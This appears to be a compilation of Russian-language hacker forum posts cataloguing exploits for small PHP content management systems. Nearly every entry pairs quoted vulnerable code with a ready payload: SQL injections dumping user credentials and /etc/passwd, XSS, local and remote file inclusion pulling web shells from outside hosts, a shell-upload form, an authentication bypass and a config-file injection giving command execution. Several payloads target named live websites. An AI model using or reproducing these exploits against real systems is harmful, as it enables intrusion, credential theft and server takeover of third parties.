Nazep Product - Nazep Version - 0.1.4.3 SQL injection Code: http://localhost/index/index.php?sec=-1'/**/union/**/all/**/select/**/version()/* вывод Code: <title></title> Admin Panel Code: http://localhost/admon/index.php Login login - 'or+1=1# pass - 123456
Moscuito CMS (all vers) - блоговый движок на файлах. PHPSELF XSS: Code: http://localhost/mosquito/%3E%3Cscript%3Ealert()%3C/script%3E Заливка шелла: Админцентр (дефолтный пароль - pass)-> Новый (плагин) -> <?php include('http://site.com/sh.txt'); ?>
Arcadem Pro CMS [2.7] xss пассивная: [localhost]/index.php?cat="><script>alert();</script> xss пассивная: [localhost]/index.php?article="><script>alert();</script> xss активная: При регистрации, в поле "Логин" вписываем , регистрирумся. При просмотре игроков, статистики и т.д. будет выполняться ваш код. xss активная: [localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number] в строке поле комментария вводим и отправляем. При просмотре комментариев выполнится ваш код. Blind SQL injection: [localhost]/index.php?article=[number]+and+ascii(substring(version(),19,1))+--+Bb0y уязвимый код: PHP: $articleid = $_GET['article']; if (is_numeric(intval($articleid)) == TRUE) { $sql = "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;";
Direct News, основная часть выше,изза переноса сообщения раззлетелись RFI Необходимо для правильной работы RFI! register_globals = ON and allow_url_open = ON! file: /admin/inc.php PHP: $from_inc = true; header("Content-Type: text/html; charset=utf-8"); if (!file_exists($rootpath .'/config.php')) { header('Location: '. $adminroot .'/install/'); die(); } // Compatibilite entre les versions de PHP require_once $rootpath .'/library/lib.compatibility.php'; // gestion de session require_once $rootpath .'/library/class.config.php'; require_once $rootpath .'/modules/panier/class.panier_article.php'; .... target:admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?
webCocoon's simpleCMS Vuln's webCocoon's simpleCMS Web site : http://webcocoon.wordpress.com Version : 0.7.0 SQL Injection Vuln file: /content/post/show.php [str:3] PHP: //Show post $get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'"); $post_result = mysql_num_rows($get_post); $post = mysql_fetch_array($get_post); Exploit: if magic_quotes = OFF Code: POST http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/index.php HTTP/1.0 Content-type: application/x-www-form-urlencoded id=xek[COLOR=White]' union select null,concat_ws(0x3a,username,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null from user -- [/COLOR]&mode=post&gfile=show *так же уязвимы параметры: year, month, date Local File Inclusion Vuln file: /templates/default/template.html [str:538] PHP: if($mode == ""){ include"content/front/$template.php"; } elseif($gfile == "$gfile"){ include"content/$mode/$gfile.php"; }else{ include"content/front/$template.php"; } Exploit: if magic_quotes = OFF Code: POST http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/index.php HTTP/1.0 Content-type: application/x-www-form-urlencoded mode=[COLOR=White]../../../../../../../[/COLOR][COLOR=Green][local_file][/COLOR][COLOR=White]%00[/COLOR]&gfile=browse
DIY CMS bSQL inj DIY CMS (Do It Yourself cms) Web site : http://www.diy-cms.com Version : 1.0 Blind SQL Injection Vuln file: /modules/users/index.php [str:48] PHP: /*...*/ if(isset($diy->get['morder'])) { $order = $diy->get['morder']; } else { $order = "userid"; } if (isset($diy->get[msort])) { $sort = $diy->get[msort]; } else { $sort = DESC; } /*...*/ $result = $diy->query("SELECT * FROM diy_users WHERE userid > '0' and userid != '$diy->Guestid' and activated = 'approved' ORDER BY $order $sort LIMIT $start,$upp"); /*...*/ Если версия MySQL=>5.0.12, можно получить данные из ошибки Duplicate column name Exploit: Code: http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/mod.php?mod=users&morder=[COLOR=White]1+and+(select+*+from+(select+*+from+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)a)b+join+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)c)d)e)[/COLOR] *так же уязвим параметр msort
там задумывался antihek system) admin/aclass/admin_func.php Code: ... 38 function format_data($r) 39 { 40 return mysql_escape_string(stripslashes(trim($r))); 41 } ... 68 $user_name = $diy->format_data($diy->post['user_name']); 69 $user_pass = $diy->format_data(md5($diy->post['user_pass'])); 70 $result = $diy->query("SELECT userid,username,password,groupid 71 FROM diy_users 72 WHERE (username ='$user_name') 73 AND (password ='$user_pass') 74 AND (groupid = 1)"); 75 if (@$diy->dbnumrows($result) > 0) { ... , но post > $user_name='=0)or(' аплоадер admin/aclass/template.php Code: ... 410 else if ($action=="uploadtemp") 411 { 412 $upload = $diy->files["name_file"]; 413 $theme = str_replace(' ','_',$diy->post[theme]); 414 $tmp_name = $upload["tmp_name"]; 415 416 if (is_uploaded_file($upload['tmp_name'])) 417 { 418 $path = $diy->upload_path."/".$upload['name']; 419 if(move_uploaded_file($tmp_name, $path)) 420 { ... diy-cms.com/500.php?yaneshell=1
Product: bloofoxCMS Author: 0.3.5 Version: http://www.bloofox.com/ LFI Need: register_globals = ON file: update/index.php PHP: $update_files[0] = "update_0.3.0-0.3.1.php"; $update_files[1] = "update_0.3.1-0.3.2.php"; $update_files[2] = "update_0.3.2-0.3.3.php"; $update_files[3] = "update_0.3.3-0.3.4.php"; $update_files[4] = "update_0.3.4-0.3.5.php"; .... if(isset($_GET['page']) && CheckInteger($_GET['page'])) { $page = $_GET['page']; $upd_var['update_file'] = SYS_WORK_DIR."/".$update_files[$page]; if(file_exists($upd_var['update_file'])) { include_once($upd_var['update_file']); } } target: Инклуд достаточно интересный,обманем скрипт Вроде быи переменная чекаеться на intval, и файл на существование,но вот переменная инклуда не чекаеться.Создаем не существующую переменную,и сами зададим ей значение: ?update_files[11]=../{LF}&page=11 Blind-SQL file: plugins/text_news/text_news.php PHP: if($login_required == 0 && $sys_explorer_vars['link_plugin'] == 31) { // init db connection $db2 = new DB_Tpl(); // create page handling $sys_vars = $cont->create_pages($db2,$_GET['start'],$sys_vars); // set template block $tpl->set_block("template_content", "content", "content_handle"); // get sys_contents $db2->query("SELECT * FROM ".$tbl_prefix."sys_content WHERE explorer_id = '".$cont->eid."' AND blocked = '0' ORDER BY sorting LIMIT ".$sys_vars['start'].",".$cont->limit.""); $no_of_records = $db2->num_rows(); target: ?login_required=0&sys_explorer_vars['link_plugin']=31&tbl_prefix=bfCMS_sys_user+where+id=1/*блабла,в этой таблице 13 колонок.
В дополнение к #249 Blind-SQL file: validate.php PHP: $username = $_GET["username"]; $password = $_GET["password"]; if(!isset($_COOKIE["deeemm"])) { //no cookie so reset cookie just in case setcookie ("deeemm", "", time() - 3600); } elseif (isset($_COOKIE["deeemm"])) { //get data from cookie $user = explode(" ",$_COOKIE["deeemm"]); //compare data against database $sql_query = "SELECT * FROM `" . $db_table_prefix . "users` WHERE `user_name` = '$user[0]'"; $result = mysql_db_query($db_name, $sql_query); target: Устанавливаем себе куку deemm со значением: "'+union+select+1,2,3,4,5,6,7,8,9,10+--+ pew-pew" Upload Shell Need: register_globals = ON file: includes/upload_file.php PHP: if (isset($_FILES['file_data'])) { if ($filename) { $destination_file = $default_path . $media_dir . $filename; echo strtolower(basename($_FILES['file_data']['name'])); } if (file_exists($destination_file)) { $count = 1; while (file_exists($destination_file)) { $filename = $count . '_' . $filename; $destination_file = $default_path . $media_dir . $filename; $count++; } } if ($filename && !file_exists($destination_file)) { if (!move_uploaded_file($_FILES['file_data']['tmp_name'], $destination_file)) { echo '<br>' . "Upload failed!" . '<br>'; echo $destination_file . '<br>'; echo ($_FILES['file_data']['name']) . '<br>'; echo ($_FILES['file_data']['tmp_name']) . '<br>'; echo ($_FILES['file_data']['size']) . '<br>'; echo ($_FILES['file_data']['type']) . '<br>'; echo ($_FILES['file_data']['error']) . '<br>'; //print_r ($_FILES); exit; } } } target: Написал Super-Exploit. Code: <form action="[COLOR=Red]http://HOST.com/upload_file.php[/COLOR]" method="post" enctype="multipart/form-data"> Shell file: <input type="file" name="file_data"><br> Path: <input type="text" name="default_path"><br> Shell name: <input type="text" name="filename"><br> <input type="submit" value="Xek!"><br> </form> Вписываем например: Path: ./ Shell name: shell.php Xek! Шелл окажеться в тойже папке что и upload_file.php
Qikblogger (qb-krypton-0.9beta-patched) http://qikblogger.sourceforge.net Blind SQL mq=off tag.php PHP: if ( isset($_GET['blog_name']) && isset($_GET['tagname']) ) { $blog_name = trim($_GET['blog_name']); $tagname = trim($_GET['tagname']); ,,, $post_ids = $b->get_tag_posts($tagname); blogs.php PHP: function get_tag_posts($tagname) if ( $db->query("SELECT tags.post_id as ids FROM tags, posts WHERE tags.tagname='$tagname' AND tags.blog_name='$this->blog_name' AND tags.post_id=posts.post_id AND posts.disp_dt < CURRENT_TIMESTAMP() ORDER BY posts.disp_dt DESC ;") ) { http://localhost/qb/tag.php?blog_name=barbie&tagname=barbie'+union+select+1+--+1
Product: LimnyCMS Author: http://www.limny.org/ Version: 1.0.1 LFI По сегодняшней традиции,оно нестрандартное,а немножно интересное file: ajax.php PHP: if(substr($_POST['page'], 0, 3) != "sub") { define("LANGUAGE", Language()); } else { define("USER", @$_POST['user']); define("LANGUAGE", UserLanguage(USER)); } // SESSION if($_POST['page'] == "contact" or $_POST['page'] == "scontact" or $_POST['page'] == "subscontact" or $_POST['page']=="registernow") { session_start(); } // CAN NOT MODIFY HEADERS if(@$_GET['page'] != "size") { require("languages/".LANGUAGE.".php"); Обратите внимание на установку Констант и на ф-цию UserLanguage(USER) PHP: function UserLanguage($username) { if(isset($_COOKIE['ulanguage'])) { return $_COOKIE['ulanguage']; } else { return UserSettings($username, "language"); } } Таким образом: target: Code: POST /target/ajax.php?page=[COLOR=Blue]pewpew[/COLOR] HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Cookie: [COLOR=Red][B]ulanguage=../../{LOCAL_FILE}%00;[/B][/COLOR] Connection: keep-alive [COLOR=YellowGreen]page=sub[/COLOR]&user=lolita Вуаля Blind-SQL file: cookie.php PHP: switch($_POST['cookie']) { case("login"); $user=@$_POST['user']; $pass=md5(@$_POST['pass']); $login_result=$db->query("SELECT user, pass, ban FROM ".TABLE_PREFIX."users WHERE user='$user' AND pass='$pass'"); if($login_row=$db->fetch_array($login_result)){ if($login_row['ban']=="1"){echo "Ban!";exit;} setcookie("username", $login_row['user'], time()+86400, '/', '', 0); setcookie("password", $login_row['pass'], time()+86400, '/', '', 0); Проверять можно по кукам,если обнулились - fail . target: {POST} ?user=lolita'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,141,516,17,18,19,20,21+--+
Дополнение к посту m0Hze Local File Inclusion Vuln file: aajax.php [str:11] PHP: require("config.php"); require("includes/functions.php"); require("includes/class_mysql.php"); $db = new dbEngine; $db->connect(HOSTNAME, USERNAME, PASSWORD); $db->select(DATABASE); define("LANGUAGE", Language()); require("languages/".LANGUAGE.".php"); /*...*/ Смотрим функцию Language() (includes/functions.php) PHP: /*...*/ function Language() { if(CheckLogin($_COOKIE['username'], $_COOKIE['password']) == true) { $language = UserOption($_COOKIE['username'], "lang"); if(isset($_COOKIE['language']) and $_COOKIE['language'] != $language) { /*...*/ } return $language; } else { if(isset($_COOKIE['language'])) { $language = $_COOKIE['language']; } else { $language = Settings("language"); } } return $language; } /*...*/ Exploit: if magic_quotes = OFF Code: GET http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/aajax.php HTTP/1.0 Cookie: language=[COLOR=White]../../../../../../../[/COLOR][COLOR=Green][local_file][/COLOR][COLOR=White]%00[/COLOR] * так же уязвимы файлы: ajax.php, majax.php, print.php, uajax.php SQL Injection Vuln file: ajax.php [str:397] PHP: /*...*/ $order=@$_POST['order']; $newsgroup=@$_POST['newsgroup']; $number=round(@$_POST['number']); $username=@$_POST['user']; if(!is_numeric($number) OR $number<=0){echo "<div class=\"error\">".$lang['error1']."</div>";exit;} if($newsgroup=="all"){$ng="";}else{$ng=" newsgroup='$newsgroup' AND";} if($order!="date"){ $lastnews_result=$db->query("SELECT id, title, pretext, datetime FROM ".TABLE_PREFIX."usernews WHERE user='$username' AND lang='".LANGUAGE."' AND$ng releasestatus='1' ORDER BY datetime DESC LIMIT $number"); }else{ /*...*/ Exploit: if magic_quotes = OFF Code: POST http://[COLOR=White][host][/COLOR]/[COLOR=White][path][/COLOR]/ajax.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: [COLOR=White][host][/COLOR] Content-Length: 175 Cookie: language=en Connection: Close Pragma: no-cache newsgroup=xek[COLOR=White]' union select null,concat_ws(0x3a,user,pass),null,null from lmn_users -- [/COLOR]&page=newslist&number=1 ------------------------------------- Limny 1.01 (Auth Bypass) SQL Injection Vulnerability
GEOBLOG 1.0 STABLE http://sourceforge.net/projects/bitdamaged/ SQL Скрипты в корне блога содержат строки: PHP: if(!is_numeric($id)) { print("Dont Be A h4x0r!!!"); exit(); Скрипты в админке проверяют PHP: if($_SESSION['login'] != "user_valid_and_logged_in") { header("Location: ../index.php"); } //End IF admin/listcomment.php не содержит таких проверок, поэтому PHP: $query[747] = mysql_query("SELECT * FROM geo_comment WHERE linkid='$id'"); уязвим, при magic_quotes_gpc = Off register_globals = On http://localhost/geoBlog/admin/listcomment.php?id=2'+union+select+1,2,3,4,5,version(),7,8+--+1
Product: SkyBlueCanvas Author: www.skybluecanvas.com Version: 1.1 Upload-ShellCode File: /wym/image.upload.php PHP: if (isset($_FILES['upload']) && !empty($_FILES['upload']['name'])) { $file = $_FILES['upload']; $dest = $_POST['upload_dir']; $ini = FileSystem::read_config( "../" . SB_MANAGERS_DIR . "media/config.php" ); $types = array(); if (isset($ini['mimes'])) { $types = $ini['mimes']; } $targets = FileSystem::list_dirs(SB_MEDIA_DIR); array_push($targets, SB_DOWNLOADS_DIR); array_push($targets, SB_UPLOADS_DIR); array_push($targets, ACTIVE_SKIN_DIR . "images/"); list($exitCode, $newfile) = $Core->UploadFile($file, $dest, $types, 5000000, $targets); if ($exitCode == 1) { $success = true; $message = '<div class="msg-success-small"><h2>Success!</h2></div>'; } else { $message = '<div class="msg-error-small"><h2>An unknown error occurred</h2></div>'; } } Нас интересует: list($exitCode, $newfile) = $Core->UploadFile($file, $dest, $types, 5000000, $targets); File: /include/core.php PHP: function UploadFile($file, $dest, $allowtypes, $maxsize=5000000, $targets=array()) { $Uploader = new Uploader($allowtypes, $targets); return $Uploader->upload($file, $dest); } $Uploader->upload($file, $dest); File: /include/uploader.php PHP: function upload($file, $dest) { if ($dest{strlen($dest)-1} != '/') $dest .= '/'; $fname = $file['name']; $ftype = trim($file['type']); $fsize = $file['size']; $newfile = null; if ($fsize > $this->max_size) { $exitCode = 7; } else if ($fsize > $this->free_space) { $exitCode = 8; } else if (!in_array($ftype, $this->types)) { $exitCode = 4; } else if (!in_array($dest, $this->targets)) { $exitCode = 4; } else { $newfile = $dest.$fname; $max = 100; $ticker = 0; while (file_exists($newfile) && $ticker < $max) { $ticker++; $bits = explode('.', $fname); $ext = $bits[count($bits)-1]; $base = implode('.', array_slice($bits, 0, -1)); $newfile = $dest."$base.$ticker.$ext"; } if (is_uploaded_file($file['tmp_name'])) { $exitCode = move_uploaded_file($file['tmp_name'], $newfile); } else { $exitCode = 0; } } return array($exitCode, $newfile); } Ну вот и добрались до сути. Target: Из-за того,что файл целевой файл(image.upload.php) просто открываеться в браузере,не происходит установки разрешеных к аплоаду расширений файлов.Так что просто отсылаем файл и POST- запрос: upload_dir=../../ Колво ../ подъемов по ФС может быть сколько душе угодно,все зависит от настроек сервера,и где лежит сама ЦМС.В итоге заимеем шелл с названием: Отсылали: shell.php Получили: shell..php
Update: #244 Версия ядра обновилась.Целевая версия - 1.1.Как водиться,с обновлением, разработчики только прибавили дырок. SQL-inj File: downloads.php PHP: if(isset($_GET['cat'])){ $result = mysql_query("SELECT * FROM xcms_downloads WHERE category=".$_GET['cat']." ORDER By id DESC") or die(mysql_error()); $content .=" <div class='post' id='post-8'> "; while($downloads = mysql_fetch_array( $result )) { $content .=" <table width='100%' cellpadding='0' cellspacing='1' class='tbl-border'> <tr> <td colspan='3' class='tbl2'><strong><a href='".DOWNLOADS.$downloads['file']."'>".$downloads['name']."</a></strong> </td> <tr> <td colspan='3' class='tbl1'>".$downloads['description']."</td> </tr> <tr> <td width='30%' class='tbl2'><strong>Added:</strong> ".$downloads['uploaded']."</td> <td width='30%' class='tbl1'><strong>Uploaded by:</strong><b><a href='".BASEDIR."profile.php?view=".$downloads['uploader']."'> ".$downloads['uploader']."</b></a></td> <td width='40%' class='tbl2'><b><a href='".$_SERVER['PHP_SELF']."?download=".$downloads['id']."'>Download (".$downloads['downloaded'].")</a></b></td> </tr> </table><br> "; } Target: Сайт разработчика: http://sphere.xlentprojects.se/downloads.php?cat=1+union+select+1,id,3,4,username,password,7,8,9+from+xcms_members+--+ Логинимся - мы администраторы.Не будем ничеготрогать,мы же не хокеры Пропустим мимо глаз то,что уязвимы 70% всех файлов.В 1 вывод лучше всего,на нем и остановимся. не надо логин-пароль писать
Update! Post: #127 RFI Need: register_globals = ON allow_url_include = ON File: /BLOX/scripts/editPageParams.php раньше была скуля,теперь там rfi PHP: if (!$GLOBALS['user']['userIsAdmin']) return; QS($K, $B, $terms); function QS($K, $B, $terms) { require_once $GLOBALS['bloxDir'] . "/functions/getPageParams.php"; if (empty($_SESSION['page'])) $pageId = $_GET['page']; else $pageId = $_SESSION['page']; $pageParams = WA($pageId); require_once $GLOBALS['bloxDir'] . "/functions/Proposition.php"; $H = new S('pageIsHidden', $pageId); $pageParams['pageIsHidden'] = $H->O(); $H = new S('parentPageIsAdopted', $pageId); if ($H->O()) { $pageParams['parentPageIsAdopted'] = true; $_SESSION['parentPageIsAdopted'] = true; } $B->C('pageParams', $pageParams); include $GLOBALS['bloxDir'] . "/includes/submitButtons.php"; include $GLOBALS['bloxDir'] . "/includes/display.php"; } ?> Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php? File: /BLOX/script/chek.php PHP: if (!$GLOBALS['user']['userIsAdmin']) return; LW($K, $B, $terms); function LW($K, $B, $terms) { require_once $GLOBALS['bloxDir'] . "/functions/getBlockParams.php"; ... Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?
Продукт: CMS-DIYAN CMS без MySQL Скачать : http://cms-diyan.ru/index.php?file=download ось: WIN LFI: линки: http://dyian/index.php?file=\..\user\1.txt http://dyian/index.php?file=\..\user\1.txt&news PHP: include_once('php/function.php'); if (!isset($_GET["file"])){ $ret=vizov_file("index"); } if (isset($_GET["file"])){ $file=$_GET["file"]; if (!ereg('^[^./][^/]*$', $file)) die("сработала защита от взлома!"); $ret=vizov_file($file); } PHP: function vizov_file($file) { $filedir="files/".$file; if (isset($_GET['news']))$filedir="news/".$file; if (file_exists($filedir)){ if ((isset($_GET["dlyadruzey"]))&&(@fopen("http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"], "r")))$filedir="http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"]; if (!file_exists($filedir))die('Не найден файл '.$filedir); $handle = fopen($filedir, "r"); $ret[4] = ''; $i=0; while (!feof($handle)) { $buffer = fgets($handle, 4096); if($i==0) $ret[0]=$buffer; elseif($i==1) $ret[1]=$buffer; elseif($i==2) $ret[2]=$buffer; elseif($i==3) $ret[3]=$buffer; else $ret[4].=$buffer; $i++; } fclose($handle);
Magazin IT online (Design & Development by Twenty Advertising) http://www.accessdatamedia.ro SQL stiri.php PHP: if(isset($_GET['id']) && ($_GET['id']!="")) { $where=' WHERE `news`.`id_news`='.$_GET['id']; } mysql_select_db($database_conn, $conn); $query_news = "SELECT * FROM news ".$where; http://www.accessdatamedia.ro/stiri.php?id=-100+union+all+select+1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4+from+mysql.user+--+ certificare.php PHP: $query_news = "SELECT * FROM `certifications` where id_certification=".stripslashes($_GET['id']); http://www.accessdatamedia.ro/certificare.php?id=-3+union+select+1,2,load_file(0x2f6574632f706173737764),4+--+
BlognPlus http://www.blogn.org/ SQL index.php PHP: case "e": $blogn_entry_id = @$_GET["e"]; $blogn_skin = preg_replace("/\{SEARCH\}[\w\W]+?\{\/SEARCH\}/", "", $blogn_skin); $blogn_skin = preg_replace("/\{PROFILES\}[\w\W]+?\{\/PROFILES\}/", "", $blogn_skin); $blogn_skin = preg_replace("/\{COMMENTLIST\}[\w\W]+?\{\/COMMENTLIST\}/", "", $blogn_skin); $blogn_skin = preg_replace("/\{COMMENTNEW\}[\w\W]+?\{\/COMMENTNEW\}/", "", $blogn_skin); $blogn_skin = preg_replace("/\{TRACKBACKLIST\}[\w\W]+?\{\/TRACKBACKLIST\}/", "", $blogn_skin); $blogn_skin = preg_replace("/\{TRACKBACKNEW\}[\w\W]+?\{\/TRACKBACKNEW\}/", "", $blogn_skin); $blogn_skin = blogn_entry_view($blogn_user, $blogn_skin, $blogn_entry_id); nikkiFuntions.php PHP: function blogn_entry_view($user, $skin, $entry_id) { $skin = preg_replace("/\{LOG\}/", "", $skin); $skin = preg_replace("/\{LOG[ ]+([\w\W]+?)\}/", "", $skin); $skin = preg_replace("/\{\/LOG\}/", "", $skin); $nextbackurl = blogn_mod_db_log_nextback_url($user, $entry_id); db_mysql.php PHP: function blogn_mod_db_log_nextback_url($user, $key_id) { $sql_connect = @mysql_connect(BLOGN_DB_HOST.":".BLOGN_DB_PORT, BLOGN_DB_USER, BLOGN_DB_PASS); mysql_select_db(BLOGN_DB_NAME); $qry = "SELECT date FROM ".BLOGN_DB_PREFIX."_loglist WHERE id = ".$key_id; http://hangulnikki.hanguk.jp/index.php?e=-100+union+select+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd'),concat_ws(0x203a20,version(),user(),host,user,password,file_priv),13+from+mysql.user--
Product: TinX CMS Author: cms.tinx.dk Version: 3.5.2 Need: magic_quotes_gpc = off register_globals=on Remote Code Executing File: /admin/actions.php PHP: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["cmsadmin"])) { //echo "POST(".$_POST["cmsadmin"].")<br>"; $defaultdocumentid = $_POST["defaultdocumentid"]; $language = $_POST["language"]; $appendToTitle = $_POST["appendToTitle"]; $www = $_POST["www"]; $theme = $_POST["theme"]; $theme = $_POST["theme"]; $template = $_POST["template"]; $loginsystem = $_POST["loginsystem"]; $companyName = $_POST["companyName"]; $siteDesign = $_POST["siteDesign"]; $searchresult_quickid = $_POST["searchresult_quickid"]; $contact_quickid = $_POST["contact_quickid"]; $sitemap_quickid = $_POST["sitemap_quickid"]; $max_root_documents = $_POST["max_root_documents"]; //phpinfo(); $d = date("Y-m-d_h-i-s", time()); exec("cp " . $system["DOCUMENT_ROOT"] . "/inc/customer_config.php " . $_SERVER["DOCUMENT_ROOT"] . "/inc/customer_config_$d.php"); $cfile = $system["DOCUMENT_ROOT"] . "/inc/customer_config.php"; $fh = fopen($cfile, 'w') or die("can't open file: No ACCESS TO FILE OR LIBRARY!!!!!"); $write = <<< html <?php /************************************************ Settings that can be changed - TinX/cms *************************************************/ \$appendToTitle = "$appendToTitle"; \$companyName = "$companyName"; \$language = "$language"; /* da = danish, en=english.... make some up */ \$defaultdocumentid = "$defaultdocumentid"; /* If index.php is launched, this document id is called */ \$searchresult_quickid = "$searchresult_quickid"; /* search page QuickID */ \$contact_quickid = "$contact_quickid"; /* contact page QuickID */ \$sitemap_quickid = "$sitemap_quickid"; /* sitemap page QuickID */ \$max_root_documents = "$max_root_documents"; /* Max number of root elements in menu */ \$www = "$www"; // Url til websitet \$theme["name"] = "$theme"; \$antalStatus = 2; \$statusNames[0] = "Aktiv"; /* statusNames indeholder statuskoder for dokumentet - aktiv/inaktiv mv */ \$statusNames[1] = "Inaktiv"; /* Google Webmaster tools */ \$googlesitemap_path = \$www . "/googlesitemap.xml"; /* Show/Hide indtastningsfelter pе settings.php: Skal feltet skjules intastes en default vГ¦rdi, ellers "" */ \$settings_options["documenttitle"] = ""; \$settings_options["category"] = "Standard"; \$settings_options["template"] = "$template"; // LOGIN TYPE \$login_system = "$loginsystem"; //values: phpBB - TinX // Other settings \$siteDesign = "$siteDesign"; \$siteDesignPath = "designs/" . \$siteDesign; \$siteTemplatePath = "designs/" . \$siteDesign ."/templates/"; \$siteContainerPath = "designs/" . \$siteDesign ."/containers/"; if (file_exists(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php")) include(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php"); else echo "### ERROR: customer_vars.php NOT FOUND ###"; ?> html; fputs($fh, $write); fclose($fh); Target: {POST} ?cmsadmin=1&appendToTitle=";system($_GET[cmd]);die(); http://yousite.com/inc/customer_config.php?cmd=dir SQL-inj File: /admin/actions.php PHP: if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["createobject"]) && $_POST["objectaction"] === "create") { $id = $_POST["docid"]; $type = $_POST["objtype"]; $title = $_POST["objtitle"]; $location = $_POST["objlocation"]; $container = $_POST["objcontainer"]; $objlink = $_POST["objlink"]; $is_copy_of = $_POST["objlinkSubCat"]; if ($type == "existingContent" && $is_copy_of > 0) { $obj_table = $objlink; $type = mysql_fetch_array($sqlPtr->selectQuery("file", $tables["object_templates"], "tablename='$objlink'")); $type = $type[0]; $insert_as_copy = true; } else { $insert_as_copy = false; $objlink = ""; $is_copy_of = "0"; } $sqlPtr->selectQuery(); PHP: function selectQuery($what, $tablename, $where="", $other="") { //echo "Lookup: " . $this->antalLookups . "<br>"; $this->antalLookups++; // $this->makeConnection(); if(strcmp($where,"") != 0) $where = "WHERE $where"; $q = "SELECT $what FROM $tablename $where $other"; //echo "Q($q)\n"; if($this->isDebug){ echo "Query($q)<br>\n"; echo "HOST($this->dbhost)<br>\n"; echo "USER($this->dbusername)<br>\n"; echo "PASS($this->dbuserpassword)<br>\n"; echo "DB($this->default_dbname)<br>\n"; } $result= mysql_query($q); if(!$result) $this->error_message($this->sql_error() . "<br><b>selectQuery($q) error</b>: $delete connected but not to table" ); // $this->closeConnection(); return $result; } Target: {POST} ?objectaction=create&objectcreate=1&objlinkSubCat=1&objtype=existingContent&objlink=1'+union+select+1,2,3,4,5/*
